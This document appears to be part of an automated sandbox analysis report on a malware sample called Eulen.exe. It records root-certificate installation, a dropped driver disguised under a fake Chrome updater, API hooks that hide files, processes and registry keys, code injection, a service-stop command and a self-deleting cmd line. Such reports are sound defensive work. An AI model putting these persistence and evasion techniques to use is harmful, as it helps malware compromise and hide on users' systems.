Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763100 push rbp; retf	19_2_000002E99176310B
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E9917630E0 push r14; retf	19_2_000002E9917630EB
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763180 push rbp; retf	19_2_000002E991763183
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763180 push rbp; retf	19_2_000002E9917631E3
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763168 push rbp; retf	19_2_000002E99176316B
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763038 push r14; retf	19_2_000002E991763043
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763008 push rsi; retf	19_2_000002E99176302B
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E9917630A8 push rbp; retf	19_2_000002E9917630AB
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763080 push rbp; retf	19_2_000002E991763083
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763070 push rbp; retf	19_2_000002E991763073
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763078 push rbp; retf	19_2_000002E991763083
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763238 push rbp; retf	19_2_000002E99176323B
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763218 push rbp; retf	19_2_000002E99176321B
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E9917599E4 push rbp; retf	19_2_000002E99176326B
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E9917631D0 push rbp; retf	19_2_000002E9917631D3
Source: C:\Windows\System32\winlogon.exe	Code function: 19_2_000002E991763270 push rbp; retf	19_2_000002E991763273

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: C:\Users\user\Desktop\Eulen.exe	File created: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Eulen.exe	File created: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	File created: C:\Program Files\Google\Libs\WR64.sys	Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	File created: C:\Windows\Temp\auqpbnqlvfdv.tmp	Jump to dropped file

Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe

File created: C:\Windows\Temp\auqpbnqlvfdv.tmp

Jump to dropped file

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Desktop\Eulen.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\AUQPBNQLVFDV.TMP
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Module Loaded: C:\WINDOWS\TEMP\AUQPBNQLVFDV.TMP
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Module Loaded: C:\WINDOWS\TEMP\AUQPBNQLVFDV.TMP
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Module Loaded: C:\WINDOWS\TEMP\AUQPBNQLVFDV.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\Eulen.exe	Memory written: PID: 7588 base: 7FFBCB910008 value: E9 EB D9 E9 FF	Jump to behavior
Source: C:\Users\user\Desktop\Eulen.exe	Memory written: PID: 7588 base: 7FFBCB7AD9F0 value: E9 20 26 16 00	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Memory written: PID: 6772 base: 7FFBCB910008 value: E9 EB D9 E9 FF
Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Memory written: PID: 6772 base: 7FFBCB7AD9F0 value: E9 20 26 16 00

Self deletion via cmd or bat file

Source: unknown	Process created: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe"
Source: C:\Users\user\Desktop\Eulen.exe	Process created: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe"			Jump to behavior

Source: C:\Windows\System32\lsass.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
